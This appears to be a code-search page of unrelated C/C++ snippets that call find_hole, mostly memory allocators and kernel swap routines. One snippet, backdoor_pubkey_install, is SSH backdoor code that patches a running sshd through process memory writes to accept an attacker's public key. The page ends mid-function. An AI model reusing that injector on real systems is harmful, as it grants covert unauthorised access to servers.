Exemplo n.º 1
0
void mm_free(seg_t base)
{
    register struct malloc_head *mh = &memmap;
    register struct malloc_hole *m;

    m = find_hole(mh, base);
    if (!m) {

#ifdef CONFIG_SWAP

	m = find_hole(&swapmap, base);
	if (!m)
	    panic("mm corruption");
	mh = &swapmap;
	printk("mm_free(): from swap\n");

#else

	panic("mm corruption");

#endif

    }

    if ((m->flags & 3) != HOLE_USED)
	panic("double free");
    m->refcount--;
    if (!m->refcount) {
	m->flags = HOLE_FREE;
	sweep_holes(mh);
    }
}
Exemplo n.º 2
0
seg_t mm_dup(seg_t base)
{
    register struct malloc_hole *o, *m;
    size_t i;

    debug("MALLOC: mm_dup()\n");
    o = find_hole(&memmap, base);
    if (o->flags != HOLE_USED)
	panic("bad/swapped hole");

#ifdef CONFIG_SWAP

    while ((m = best_fit_hole(&memmap, o->extent)) == NULL) {
	seg_t s = swap_strategy(NULL);
	if (!s || swap_out(s) == -1)
	    return NULL;
    }

#else

    m = best_fit_hole(&memmap, o->extent);
    if (m == NULL)
	return NULL;

#endif

    split_hole(&memmap, m, o->extent);
    m->flags = HOLE_USED;
    m->refcount = 1;
    i = (o->extent << 4);
    fmemcpy(m->page_base, 0, o->page_base, 0, (__u16) i);
    return m->page_base;
}
MemPool_Handle MemPool_FixedArea::alloc_mem(Uint32 p_amount) {


	ERR_FAIL_COND_V(chunks_allocated==MAX_CHUNKS,MemPool_Handle());
	
	Uint32 size_to_alloc=p_amount;
	
	ChunkMapPos new_chunk_map_pos;
	
	if (find_hole(&new_chunk_map_pos, size_to_alloc)) {
		/* No hole could be found, try compacting mem */
		compact();
		/* Then search again */
		ERR_FAIL_COND_V(find_hole(&new_chunk_map_pos, size_to_alloc),MemPool_Handle()); //cant compact or out of memory
	}
	
	ChunkMemPos new_chunk_mem_pos;
	
	ERR_FAIL_COND_V( get_free_chunk_struct(&new_chunk_mem_pos) , MemPool_Handle() );
	
	for (Sint32 i=chunks_allocated;i>new_chunk_map_pos;i++) {
		
		chunk_map[i]=chunk_map[i-1];
	}
	
	chunk_map[new_chunk_map_pos]=new_chunk_mem_pos;
	
	chunks_allocated++;
	
	MemChunk &chunk=mem_chunks[ chunk_map[ new_chunk_map_pos ] ];
	
	chunk.len=size_to_alloc;
	chunk.pos=(new_chunk_map_pos==0)?0:mem_chunks[ chunk_map[ new_chunk_map_pos-1 ] ].end(); //alloc either at begining or end of previous
	chunk.lock=0;
	chunk.check=check_count++;
	
	return MemPool_Handle(&chunk,chunk.check);
}
Exemplo n.º 4
0
static int swap_out(seg_t base)
{
    register struct task_struct *t;
    register struct malloc_hole *o = find_hole(&memmap, base);
    struct malloc_hole *so;
    int ct, blocks;

    /* We can hit disk this time. Allocate a hole in 1K increments */
    blocks = (o->extent + 0x3F) >> 6;
    so = best_fit_hole(&swapmap, blocks);
    if (so == NULL) {
	/* No free swap */
	return -1;
    }
    split_hole(&swapmap, so, blocks);
    so->flags = HOLE_USED;
    so->refcount = o->refcount;

    for_each_task(t) {
	int c = t->mm.flags;
	if (t->mm.cseg == base && !(c & CS_SWAP)) {
	    t->mm.cseg = so->page_base;
	    t->mm.flags |= CS_SWAP;
	    debug2("MALLOC: swaping out code of pid %d blocks %d\n",
		   t->pid, blocks);
	}
	if (t->mm.dseg == base && !(c & DS_SWAP)) {
	    t->mm.dseg = so->page_base;
	    t->mm.flags |= DS_SWAP;
	    debug2("MALLOC: swaping out data of pid %d blocks %d\n",
		   t->pid, blocks);
	}
    }

    /* Now write the segment out */
    for (ct = 0; ct < blocks; ct++) {
	swap_buf.b_blocknr = so->page_base + ct;
	swap_buf.b_dev = swap_dev;
	swap_buf.b_lock = 0;
	swap_buf.b_dirty = 1;
	swap_buf.b_seg = o->page_base;
	swap_buf.b_data = ct << 10;
	ll_rw_blk(WRITE, &swap_buf);
	wait_on_buffer(&swap_buf);
    }
    o->flags = HOLE_FREE;
    sweep_holes(&memmap);

    return 1;
}
Exemplo n.º 5
0
/* 	Increase refcount */
seg_t mm_realloc(seg_t base)
{
    register struct malloc_hole *m;

#ifdef CONFIG_SWAP

    base = validate_address(base);

#endif

    m = find_hole(&memmap, base);
    m->refcount++;

    return m->page_base;
}
Exemplo n.º 6
0
/*
 * Resize a hole
 */
struct malloc_hole *mm_resize(struct malloc_hole *m, segext_t pages)
{
    register struct malloc_hole *next;
    register segext_t ext;
    seg_t base;
    if(m->extent >= pages){
        /* for now don't reduce holes */           
        return m;
    } 
    
    next = m->next;
    ext = pages - m->extent;
    if(next->flags == HOLE_FREE && next->extent >= ext){    
        m->extent += ext;
        next->extent -= ext;
        next->page_base += ext;
        if(next->extent == 0){
            next->flags == HOLE_SPARE;
            m->next = next->next;
        }
        return m;
    }

#ifdef CONFIG_ADVANCED_MM

    base = mm_alloc(pages);
    if(!next){
        return NULL; /* Out of luck */    
    }
    fmemcpy(base, 0, m->page_base, 0, (__u16)(m->extent << 4));
    next = find_hole(&memmap, base);
    next->refcount = m->refcount;
    m->flags = HOLE_FREE;
    sweep_holes(&memmap);
    
    return next;

#else

    return NULL;

#endif

}
Exemplo n.º 7
0
int sys_brk(__pptr len)
{
    register __ptask currentp = current;

    if (len < currentp->t_enddata)
        return -ENOMEM;
        
    if (currentp->t_begstack > currentp->t_endbrk)
        if(len > currentp->t_endseg - 0x1000)
            return -ENOMEM;

#ifdef CONFIG_EXEC_ELKS
    if(len > currentp->t_endseg){
        /* Resize time */
        register struct malloc_hole *h;
        
        h = find_hole(&memmap, currentp->mm.dseg);    
        
        h = mm_resize(h, (len + 15) >> 4);
        if(!h){
            return -ENOMEM;
        }
        if(h->refcount != 1){   
            panic("Relocated shared hole");
        }
        
        currentp->mm.dseg = h->page_base;
        currentp->t_regs.ds = h->page_base;
        currentp->t_regs.ss = h->page_base;
        currentp->t_endseg = len;
    }
#endif
brk_return:
    currentp->t_endbrk = len;

    return 0;
}
Exemplo n.º 8
0
PoolAllocator::ID PoolAllocator::alloc(int p_size) {

	ERR_FAIL_COND_V(p_size < 1, POOL_ALLOCATOR_INVALID_ID);
#ifdef DEBUG_ENABLED
	if (p_size > free_mem) OS::get_singleton()->debug_break();
#endif
	ERR_FAIL_COND_V(p_size > free_mem, POOL_ALLOCATOR_INVALID_ID);

	mt_lock();

	if (entry_count == entry_max) {
		mt_unlock();
		ERR_PRINT("entry_count==entry_max");
		return POOL_ALLOCATOR_INVALID_ID;
	}

	int size_to_alloc = aligned(p_size);

	EntryIndicesPos new_entry_indices_pos;

	if (!find_hole(&new_entry_indices_pos, size_to_alloc)) {
		/* No hole could be found, try compacting mem */
		compact();
		/* Then search again */

		if (!find_hole(&new_entry_indices_pos, size_to_alloc)) {

			mt_unlock();
			ERR_PRINT("memory can't be compacted further");
			return POOL_ALLOCATOR_INVALID_ID;
		}
	}

	EntryArrayPos new_entry_array_pos;

	bool found_free_entry = get_free_entry(&new_entry_array_pos);

	if (!found_free_entry) {
		mt_unlock();
		ERR_FAIL_COND_V(!found_free_entry, POOL_ALLOCATOR_INVALID_ID);
	}

	/* move all entry indices up, make room for this one */
	for (int i = entry_count; i > new_entry_indices_pos; i--) {

		entry_indices[i] = entry_indices[i - 1];
	}

	entry_indices[new_entry_indices_pos] = new_entry_array_pos;

	entry_count++;

	Entry &entry = entry_array[entry_indices[new_entry_indices_pos]];

	entry.len = p_size;
	entry.pos = (new_entry_indices_pos == 0) ? 0 : entry_end(entry_array[entry_indices[new_entry_indices_pos - 1]]); //alloc either at begining or end of previous
	entry.lock = 0;
	entry.check = (check_count++) & CHECK_MASK;
	free_mem -= size_to_alloc;
	if (free_mem < free_mem_peak)
		free_mem_peak = free_mem;

	ID retval = (entry_indices[new_entry_indices_pos] << CHECK_BITS) | entry.check;
	mt_unlock();

	//ERR_FAIL_COND_V( (uintptr_t)get(retval)%align != 0, retval );

	return retval;
}
Exemplo n.º 9
0
static int init(void)
{
#if HWLOC_API_VERSION >= 0x20000
    int rc;
    bool space_available = false;
    uint64_t amount_space_avail = 0;

    /* ensure we have the topology */
    if (OPAL_SUCCESS != (rc = opal_hwloc_base_get_topology())) {
        return rc;
    }

    if (VM_HOLE_NONE == mca_rtc_hwloc_component.kind) {
        return ORTE_SUCCESS;
    }

    /* get the size of the topology shared memory segment */
    if (0 != hwloc_shmem_topology_get_length(opal_hwloc_topology, &shmemsize, 0)) {
        opal_output_verbose(2, orte_rtc_base_framework.framework_output,
                            "%s hwloc topology shmem not available",
                            ORTE_NAME_PRINT(ORTE_PROC_MY_NAME));
        return ORTE_SUCCESS;
    }

    if (ORTE_SUCCESS != (rc = find_hole(mca_rtc_hwloc_component.kind,
                                        &shmemaddr, shmemsize))) {
        /* we couldn't find a hole, so don't use the shmem support */
        if (4 < opal_output_get_verbosity(orte_rtc_base_framework.framework_output)) {
            FILE *file = fopen("/proc/self/maps", "r");
            if (file) {
                char line[256];
                opal_output(0, "%s Dumping /proc/self/maps",
                            ORTE_NAME_PRINT(ORTE_PROC_MY_NAME));
                while (fgets(line, sizeof(line), file) != NULL) {
                    char *end = strchr(line, '\n');
                    if (end) {
                       *end = '\0';
                    }
                    opal_output(0, "%s", line);
                }
                fclose(file);
            }
        }
        return ORTE_SUCCESS;
    }
    /* create the shmem file in our session dir so it
     * will automatically get cleaned up */
    asprintf(&shmemfile, "%s/hwloc.sm", orte_process_info.jobfam_session_dir);
    /* let's make sure we have enough space for the backing file */
    if (OPAL_SUCCESS != (rc = enough_space(shmemfile, shmemsize,
                                           &amount_space_avail,
                                           &space_available))) {
        opal_output_verbose(2, orte_rtc_base_framework.framework_output,
                            "%s an error occurred while determining "
                            "whether or not %s could be created for topo shmem.",
                            ORTE_NAME_PRINT(ORTE_PROC_MY_NAME), shmemfile);
        free(shmemfile);
        shmemfile = NULL;
        return ORTE_SUCCESS;
    }
    if (!space_available) {
        if (1 < opal_output_get_verbosity(orte_rtc_base_framework.framework_output)) {
            orte_show_help("help-orte-rtc-hwloc.txt", "target full", true,
                           shmemfile, orte_process_info.nodename,
                           (unsigned long)shmemsize,
                           (unsigned long long)amount_space_avail);
        }
        free(shmemfile);
        shmemfile = NULL;
        return ORTE_SUCCESS;
    }
    /* enough space is available, so create the segment */
    if (-1 == (shmemfd = open(shmemfile, O_CREAT | O_RDWR, 0600))) {
        int err = errno;
        if (1 < opal_output_get_verbosity(orte_rtc_base_framework.framework_output)) {
            orte_show_help("help-orte-rtc-hwloc.txt", "sys call fail", true,
                           orte_process_info.nodename,
                           "open(2)", "", strerror(err), err);
        }
        free(shmemfile);
        shmemfile = NULL;
        return ORTE_SUCCESS;
    }
    /* ensure nobody inherits this fd */
    opal_fd_set_cloexec(shmemfd);
    /* populate the shmem segment with the topology */
    if (0 != (rc = hwloc_shmem_topology_write(opal_hwloc_topology, shmemfd, 0,
                                              (void*)shmemaddr, shmemsize, 0))) {
        opal_output_verbose(2, orte_rtc_base_framework.framework_output,
                            "%s an error occurred while writing topology to %s",
                            ORTE_NAME_PRINT(ORTE_PROC_MY_NAME), shmemfile);
        unlink(shmemfile);
        free(shmemfile);
        shmemfile = NULL;
        close(shmemfd);
        shmemfd = -1;
        return ORTE_SUCCESS;
    }
#endif

    return ORTE_SUCCESS;
}
Exemplo n.º 10
0
elemptr symmodel::get_model_widx( const vector<string>& parsed, const vector<size_t>& idx, const vector<elemptr>& trace )
  {
    //I start with it already parsed.
    //If parsed.size() == 0, I simply return this (with an index?)
    //The empty string indicates "this" model? No, when I parse it, I need to sep it, so an empty, will return in a zero-parse, of size zero, or nothing?
    //Either way, would result in same, so return ;)
    if( parsed.size() == 0 || parsed[0].compare("") == 0 )
      {
	fprintf(stdout, "FOUND MODEL! [%s]\n", buildpath().c_str() );
	elemptr t = elemptr( shared_from_this(), idx );
	return t;
      }
    else
      {
	fprintf(stdout, "Model [%s], attempting to find model name [%s] widx (note, trace size is [%lu])\n", buildpath().c_str(), CAT(parsed, "/").c_str(), trace.size());
      }
    //This is the next model I will go into
    string submodel = parsed[0];
    vector<string> remainder( parsed.begin()+1, parsed.end() ); //same as remainder, remainder.erase(0);
    
    //REV: This is where I should iterate up the tree! This is the issue.
    vector<size_t> mlocs = find_model( submodel );
    vector<size_t> hlocs = find_hole( submodel );
    
    //At this point, we are finding the hole etc. normally.
    if( mlocs.size() >= 1 )
      {
	if( mlocs.size() > 1 )
	  {
	    fprintf(stderr, "WTF found more than one in getmodelwidx\n");
	    exit(1);
	  }
	
	size_t mloc = mlocs[0];
	//add model to trace? I guess? It is a submodel, so it is not necessary I guess? But it helps it find submodels I guess? Could this cause a problem?

	fprintf(stdout, "Model [%s], going through submodel [%s] to find [%s]\n", buildpath().c_str(), models[mloc]->localname.c_str(), CAT(remainder, "/").c_str() );
	
	std::shared_ptr<symmodel> nextmodel = models[mloc];

	//Don't add to trace because if same model, parent will cause infinite loop in combin with trace.
	//However
	//Problem is if I go through a hole, and the hole is the same model, that is the main problem
	vector<elemptr> newtrace = trace;
	//size_t idx_in_submodel = idx; //no change, b/c submodel.
	vector<size_t> idx_in_submodel = idx; //no change, b/c submodel.
	//newtrace.push_back( elemptr( shared_from_this(), idx ) );
	
	return nextmodel->get_model_widx( remainder, idx_in_submodel, newtrace );
      }
    else if( hlocs.size() >= 1 )
      {
	if( hlocs.size() > 1)
	  {
	    fprintf(stderr, "WTF more than one HOLE found in getmodelwidx\n");
	    exit(1);
	  }
	

	size_t hloc = hlocs[0];
	fprintf(stdout, "Model [%s], going through hole [%s] to find [%s]\n", buildpath().c_str(), holes[hloc].name.c_str(), CAT(remainder, "/").c_str());
	if( holes[ hloc ].members.size() != 1 )
	  {
	    fprintf(stderr, "ERROR in get_model_widx, getting [%s] from HOLE, but hole [%s] has size [%lu], but it should be 1\n", submodel.c_str(), holes[hloc].name.c_str(), holes[hloc].members.size() );
	    exit(1);
	  }

	//REV: so in the case it does not exist yet, we have a problem?
	std::shared_ptr<symmodel> nextmodel = holes[hloc].members[0];
	
	if( check_same_toplevel_model( nextmodel ) )
	  {
	    //Dont add to trace because its same model so infinite loop with going to parent.x
	    vector<elemptr> newtrace = trace;
	    //size_t idx_in_submodel = idx; //no change, b/c submodel.
	    vector<size_t> idx_in_submodel = idx; //no change, b/c submodel.
	    //newtrace.push_back( elemptr( shared_from_this(), idx ) );
	    
	    return nextmodel->get_model_widx( remainder, idx_in_submodel, newtrace );
	  }
	else //not same toplevel model
	  {
	    //I NEED TO GO THROUGH A CORRESPONDENCE

	    fprintf(stdout, "REV: about to go through a corresp to get a non-same model thing through a hole...\n");
	    //std::shared_ptr<corresp> mycorresp;
	    auto mycorresp  = getcorresp( nextmodel );
	    if( !mycorresp )
	      {
		fprintf(stderr, "REV: getcorresp in get_model_widx, failed, no such corresp exists between [%s] and [%s]\n", buildpath().c_str(), nextmodel->buildpath().c_str());
		exit(1);
	      }
	    
	    
	    //REV; SANITY, if corresp not allocated yet, just return 0.
	    //size_t idx_in_submodel = 0;
	    vector<size_t> idx_in_submodel(1,0);
	    
	    //REV; Don't check this here, check this in the corresp struct? I.e. return dummy data if it is not existing yet (or exit?)
	    if(mycorresp->isinit())
	      {
		fprintf(stdout, "Corresp is INIT!!!! Will attempt a GETALL...\n");
		//REV: TODO HERE, just return it directly, with new IDX_IN_SUBMODEL ;0
		//REV: this is it!!! This is where I 
		vector<size_t> sanity = mycorresp->getall( idx );
		
		fprintf(stdout, "Attempted to GETALL from the corresp!\n");
		/*if( sanity.size() != 1 )
		  {
		  fprintf(stderr, "SANITY check for corresp during access failed! Expected corresp for idx [%lu] of model [%s] to have only 1 corresponding element in model [%s], but it had [%lu]\n", idx, buildpath().c_str(), nextmodel->buildpath().c_str(), sanity.size() );
		  exit(1);
		  }
		  size_t idx_in_submodel = sanity[0]; //no change, b/c submodel.
		*/

		idx_in_submodel = sanity;
	      }
	    
	    vector<elemptr> newtrace = trace;
	    newtrace.push_back( elemptr( shared_from_this(), idx ) );

	    fprintf(stdout, "About to get next model with idx...\n");
	    auto toret = nextmodel->get_model_widx( remainder, idx_in_submodel, newtrace );
	    fprintf(stdout, "FINISHED About to get next model with idx...\n");
	    return toret;
	  }
      } //end if not found in HOLES (or submodels)
    else
      {
	fprintf(stdout, "Model [%s], walking up to parent [%s] to find [%s]\n", buildpath().c_str(), parent->localname.c_str(), CAT(parsed, "/").c_str());
	//Else, try to bubble up to ROOT.
	if( parent && (parent->parent) )
	  {
	    std::shared_ptr<symmodel> nextmodel = parent;
	    
	    vector<elemptr> newtrace = trace;
	    //size_t idx_in_submodel = idx; //no change, b/c submodel.
	    vector<size_t> idx_in_submodel = idx; //no change, b/c submodel.
	    //newtrace.push_back( elemptr( shared_from_this(), idx ) );
	    
	    return nextmodel->get_model_widx( parsed, idx_in_submodel, newtrace );
	  }
	else if(  parent && !(parent->parent) )
	  {
	    //Couldn't find it! Return empty elemptr...bad.
	    elemptr ep;
	    return ep;
	  }
	else
	  {
	    fprintf(stderr, "REV; this should never happen weird, Neither parent nor parent->parent? In searching for model with idx. Exit\n");
	    if( parent )
	      {
		fprintf( stderr, "Parent of me [%s] exists and is [%s]\n", buildpath().c_str(), parent->buildpath().c_str() );
	      }
	    else
	      {
		fprintf( stderr, "Parent does not exist... (note current model is [%s])!\n", buildpath().c_str() );
	      }
	    exit(1);
	  }
      } //couldn't find in "else" (i.e. not in this model, so try bubbling up parents)
    
    if(trace.size() == 0)
      {
	fprintf(stderr, "Trace size zero. This should never happen (should have been caught above)\n");
	exit(1);
      }

    //REV: Did I mess something up? First it should check through all guys directly to see if it is same model? I.e. if target model matches b/c we can use that idx.
    fprintf(stdout, "Couldn't find model [%s] in previous model trace [%s], so moving to next! (trace size is [%lu])\n", CAT(parsed,"/").c_str(), buildpath().c_str(), trace.size() );
    
    //Move back model and try again?
    vector<elemptr> newtrace = trace;
    //size_t idx_in_submodel = newtrace[ newtrace.size() - 1].idx; //end of trace.
    vector<size_t> idx_in_submodel = newtrace[ newtrace.size() - 1].idx; //end of trace.
    std::shared_ptr<symmodel> nextmodel = newtrace[ newtrace.size() - 1].model;
    newtrace.pop_back();

    fprintf(stdout, "Will now try to run with new trace size [%lu]\n", newtrace.size() );
    return nextmodel->get_model_widx( parsed, idx_in_submodel, newtrace );
    
  } //end get_model_widx
Exemplo n.º 11
0
void backdoor_pubkey_install(inject_ctx *ctx, char *pubkey) {
	signature signatures[]={
		{ 0x1, "key_allowed", "trying public key file %s", 0 },
		{ 0x2, "restore_uid", "restore_uid: %u/%u"       , 0 },
		{ 0x3, "key_new"    , "key_new: RSA_new failed"  , 0 }, 
		{ 0x4, "key_read"   , "key_read: type mismatch: ", 0 }, 
		{ 0x5, "key_free"   , "key_free: "               , 0 }, 
	};

	u8 *evil_bin;
	int i;
	u32 callcache_total, num_key_allowed2_calls=0;
	char line[255];
	callcache_entry *callcache, *entry;
	u64 user_key_allowed2_calls[MAX_KEY_ALLOWED_CALLS];
	u64 diff=0, hole_addr=0, *import_table;

	evil_bin = malloc(hook_pubkey_bin_len);
	import_table = (u64*)(evil_bin + 8);

	memcpy(evil_bin, hook_pubkey_bin, hook_pubkey_bin_len);

	import_table[0] = ctx->config_addr;

	for(i = 0; i < sizeof(signatures) / sizeof(signature); i++) {
		if (ctx->uses_new_key_system == 0 || i < 2) {
			signatures[i].addr = sub_by_debugstr(ctx, signatures[i].str);
		} else {
			u64 f_dsa_new, f_bn_new, p_dsa_new, p_bn_new, callpair, callpair_b, p_rsa_free, p_dsa_free;

			switch(i) {
				case 2: // key_new
					f_dsa_new = resolve_reloc(
						ctx->rela, ctx->rela_sz, ctx->dynsym, ctx->dynsym_sz, (char*)ctx->dynstr, "DSA_new"
					);

					f_bn_new = resolve_reloc(
						ctx->rela, ctx->rela_sz, ctx->dynsym, ctx->dynsym_sz, (char*)ctx->dynstr, "BN_new"
					);

					info("DSA_new@got = 0x%lx", f_dsa_new);
					info("BN_new@got = 0x%lx", f_bn_new);

					p_dsa_new = find_plt_entry(ctx, ctx->elf_base + f_dsa_new);
					p_bn_new = find_plt_entry(ctx, ctx->elf_base + f_bn_new);

					info("DSA_new@plt = 0x%lx", p_dsa_new);
					info("BN_new@plt = 0x%lx", p_bn_new);

					callpair = find_callpair(p_dsa_new, p_bn_new);

					info("yo we got a callpair for (DSA_new, BN_new) -> 0x%lx", callpair);

					signatures[i].addr = find_entrypoint(callpair);
				break;

				case 3: // key_read
					signatures[i].addr = prevcall_by_debugstr(ctx, "user_key_allowed: advance: ");
				break;

				case 4: // key_free
					p_rsa_free = find_plt_entry(ctx, ctx->elf_base + resolve_reloc(
						ctx->rela, ctx->rela_sz, ctx->dynsym, ctx->dynsym_sz, (char*)ctx->dynstr, "RSA_free"
					));

					p_dsa_free = find_plt_entry(ctx, ctx->elf_base + resolve_reloc(
						ctx->rela, ctx->rela_sz, ctx->dynsym, ctx->dynsym_sz, (char*)ctx->dynstr, "DSA_free"
					));

					info("RSA_free@plt = 0x%lx", p_rsa_free);
					info("DSA_free@plt = 0x%lx", p_dsa_free);

					callpair_b = find_callpair(p_rsa_free, p_dsa_free);

					if(callpair_b == 0) {
						callpair_b = find_callpair(p_dsa_free, p_rsa_free);
					}

					if(callpair_b != 0) {
						info("found callpair @ 0x%lx .. finding entrypoint..", callpair_b);

						signatures[i].addr = find_entrypoint_inner(callpair_b, 3);
					} else {
						error("could not find valid callpair to derive key_free()");
					}
				break;

				default:
					error("WTF just happened!");
				break;
			}
		}

		if (signatures[i].addr == 0) {
			error("%s not found :(\n", signatures[i].name);
		}

		sprintf(line, 
			"%s\t\t= \x1b[37m0x%lx",
			signatures[i].name, signatures[i].addr - ctx->elf_base
		);

		import_table[ signatures[i].import_id ] = signatures[i].addr;

		sprintf(
			line+strlen(line), 
			" .. patched at offset 0x%lx in import table!", 
			(signatures[i].import_id*8) & 0xffff
		);

		info(line);
	}

	u64 f_BN_cmp = resolve_reloc(ctx->rela, ctx->rela_sz, ctx->dynsym, ctx->dynsym_sz, (char*)ctx->dynstr, "BN_cmp");
	info("BN_cmp@got = 0x%lx", f_BN_cmp);
	u64 l_BN_cmp;
	_peek(ctx->pid, ctx->elf_base + f_BN_cmp, &l_BN_cmp, 8);
	info("BN_cmp@lib = 0x%lx", l_BN_cmp);

	import_table[6] = l_BN_cmp;

	callcache = get_callcache();
	callcache_total = get_callcachetotal();

	for(i=0; i<callcache_total; i++) {
		entry = &callcache[i];
		if (entry->dest == signatures[0].addr && entry->type == CALLCACHE_TYPE_CALL) {
			info("found a 'call user_key_allowed' @ 0x%lx", entry->addr);
			user_key_allowed2_calls[num_key_allowed2_calls] = entry->addr;
			num_key_allowed2_calls++;
		}
	}

	if (num_key_allowed2_calls == 0)
		error("no call to user_key_allowed2 found :(");

	hole_addr = find_hole(ctx, user_key_allowed2_calls[0], 0x1000);
	
	if (hole_addr == 0) {
		error("unable to find neighborly hole.");
	}

	info("found usable hole @ 0x%lx", hole_addr);

	info2("entering critical phase");

	_mmap(
		ctx, (void*)hole_addr, 0x1000,
		PROT_READ| PROT_WRITE | PROT_EXEC,
		MAP_ANONYMOUS | MAP_SHARED | MAP_FIXED,
		0, 0
	);

	for(i=0; i<num_key_allowed2_calls; i++) {
		diff = 0x100000000-(user_key_allowed2_calls[i]-hole_addr)-5;

		info(
			"building a bridge [0x%lx->0x%lx] .. opcode = [E8 %02X %02X %02X %02X]",
			user_key_allowed2_calls[i], hole_addr,
			diff & 0xff, (diff>>8)&0xff, (diff>>16)&0xff, (diff>>24)&0xff
		);

		_poke(ctx->pid, user_key_allowed2_calls[i]+1, &diff, 4);
	}

	_poke(ctx->pid, hole_addr, evil_bin, hook_pubkey_bin_len);

	for(i=0; i<hook_pubkey_bin_len; i++) {
		if (memcmp(evil_bin+i, "\xaa\xbb\xcc\xdd", 4) == 0) {
			info("inserting pubkey at offset %x in payload", i);
			_poke(ctx->pid, hole_addr+i, pubkey, strlen(pubkey));
		}
	}

	info("poked evil_bin to 0x%lx.", hole_addr);
}
Exemplo n.º 12
0
/**
 * Allocate a block of memory
 *
 * @param sz size of the required block
 * @returns pointer to block
 */
void *kmalloc(u32 sz)
{
	kerror(ERR_DETAIL, "Allocating %d bytes of memory", sz);

	// We don't want two processes using the same memory block!
	lock(&alloc_lock);

	// Find the smallest memory block that we can use
	u32 idx = find_hole(sz);

	// Couldn't find one...
	if(idx == 0xFFFFFFFF) return 0;

	int block = idx >> 16;
	int index = idx & 0xFFFF;

	if(empty_slots(block) == 4) // Get ready ahead of time
	{
		u32 asz = ALLOC_BLOCK * sizeof(struct alcent);

		u32 idx = find_hole(asz);
		if(idx == 0xFFFFFFFF) kpanic("Could not create another allocation block!");

		int block = idx >> 16;
		int index = idx & 0xFFFF;

		if(allocs[block][index].size == asz)
		{
			allocs[block][index].used = 1;
			allocs[get_free_block()] = (struct alcent *)allocs[block][index].addr;
		}
		else
		{
			allocs[block][index].size -= asz;
			struct alcent ae = { .valid = 1, .used = 1, .addr = allocs[block][index].addr, .size = asz };
			allocs[block][index].addr += asz;
			add_alloc(&ae);
			allocs[get_free_block()] = (struct alcent *)ae.addr;
		}
	}

	// If the previous block of code was used, we may have to reinitialize these
	idx = find_hole(sz);
	if(idx == 0xFFFFFFFF) return 0;
	block = idx >> 16;
	index = idx & 0xFFFF;


	if(allocs[block][index].size == sz)
	{
		allocs[block][index].used = 1;
		unlock(&alloc_lock);
		kerror(ERR_DETAIL, "  -> %08X W", allocs[block][index].addr);
		return (void *)allocs[block][index].addr;
	}

	allocs[block][index].size -= sz; // We are using part of this block

	struct alcent ae = { .valid = 1, .used = 1, .addr = allocs[block][index].addr, .size = sz };

	allocs[block][index].addr += sz; // We don't want anything else using the allocated memory

	add_alloc(&ae); // We will just assume this worked, the worst that could happen is we can't `free` it (FIXME)

	// Let other processes allocate memory
	unlock(&alloc_lock);

	kerror(ERR_DETAIL, "  -> %08X P", ae.addr);
	return (void *)ae.addr;
}

/**
 * Free an allocated block of memory
 *
 * @param ptr pointer to the previously allocated memory block
 */
void kfree(void *ptr)
{
	kerror(ERR_DETAIL, "Freeing %08X", ptr);

	lock(&alloc_lock);

	int i, j = 0;

	// Find the corresponding memory block
	for(; j < ALLOC_BLOCKS; j++)
	{
		if(!allocs[j]) continue;
		for(i = 0; i < ALLOC_BLOCK; i++)
			if(allocs[j][i].valid) // Is it valid?
				if(allocs[j][i].addr == (u32)ptr) // Is it the correct block?
					rm_alloc(j, i); // Free it!
	}

	unlock(&alloc_lock);
}
Exemplo n.º 13
0
static int swap_in(seg_t base, int chint)
{
    register struct malloc_hole *o;
    struct malloc_hole *so;
    int ct, blocks;
    register struct task_struct *t;

    so = find_hole(&swapmap, base);
    /* Find memory for this segment */
    o = best_fit_hole(&memmap, so->extent << 6);
    if (o == NULL)
	return -1;

    /* Now read the segment in */
    split_hole(&memmap, o, so->extent << 6);
    o->flags = HOLE_USED;
    o->refcount = so->refcount;

    blocks = so->extent;

    for (ct = 0; ct < blocks; ct++) {
	swap_buf.b_blocknr = so->page_base + ct;
	swap_buf.b_dev = swap_dev;
	swap_buf.b_lock = 0;
	swap_buf.b_dirty = 0;
	swap_buf.b_uptodate = 0;
	swap_buf.b_seg = o->page_base;
	swap_buf.b_data = ct << 10;

	ll_rw_blk(READ, &swap_buf);
	wait_on_buffer(&swap_buf);
    }

    /*
     *      Update the memory management tables
     */
    for_each_task(t) {
	int c = t->mm.flags;
	if (t->mm.cseg == base && c & CS_SWAP) {
	    debug2("MALLOC: swapping in code of pid %d seg %x\n",
		   t->pid, t->mm.cseg);
	    t->mm.cseg = o->page_base;
	    t->mm.flags &= ~CS_SWAP;
	}
	if (t->mm.dseg == base && c & DS_SWAP) {
	    debug2("MALLOC: swapping in data of pid %d seg %x\n",
		   t->pid, t->mm.dseg);
	    t->mm.dseg = o->page_base;
	    t->mm.flags &= ~DS_SWAP;
	}
	if (c && !t->mm.flags) {
	    t->t_regs.cs = t->mm.cseg;
	    t->t_regs.ds = t->mm.dseg;
	    t->t_regs.ss = t->mm.dseg;

	    put_ustack(t, 2, t->t_regs.cs);
	}
    }

    /* Our equivalent of the Linux swap cache. Try and avoid writing CS
     * back. Need to kill segments on last exit for this to work, and
     * keep a table - TODO
     */
#if 0
    if (chint==0)
#endif
    {
	so->refcount = 0;
	so->flags = HOLE_FREE;
	sweep_holes(&swapmap);
    }

    return 0;
}
Exemplo n.º 14
0
void *alloc(uint32_t size, uint8_t page_align, heap_t *heap)
{
	uint32_t new_size = size + sizeof(header_t) + sizeof(footer_t);
	int32_t iterator = find_hole(new_size, page_align, heap);
	
	if (iterator == (int32_t) -1) {
		uint32_t old_length = heap->end_address - heap->start_address;
		uint32_t old_end_address = heap->end_address;

		expand(old_length+new_size, heap);
		uint32_t new_length = heap->end_address-heap->start_address;

		iterator = 0;

		int32_t idx = -1;
		uint32_t value = 0x0;
		while (iterator < (int32_t) heap->index.size)
		{
		    uint32_t tmp = (uint32_t)lookup_list(iterator, &heap->index);
		    if (tmp > value)
		    {
			 value = tmp;
			 idx = iterator;
		    }
		    iterator++;
		}

		if (idx == -1)
		{
		    header_t *header = (header_t *)old_end_address;
		    header->magic = HEAP_MAGIC;
		    header->size = new_length - old_length;
		    header->is_hole = 1;
		    footer_t *footer = (footer_t *) (old_end_address + header->size - sizeof(footer_t));
		    footer->magic = HEAP_MAGIC;
		    footer->header = header;
		    insert_list((void*)header, &heap->index);
		}
		else
		{
		    header_t *header = lookup_list(idx, &heap->index);
		    header->size += new_length - old_length;
		    footer_t *footer = (footer_t *) ( (uint32_t)header + header->size - sizeof(footer_t) );
		    footer->header = header;
		    footer->magic = HEAP_MAGIC;
		}
		
		return alloc(size, page_align, heap);
	}
	
	header_t *orig_hole_header = (header_t *)lookup_list(iterator, &heap->index);
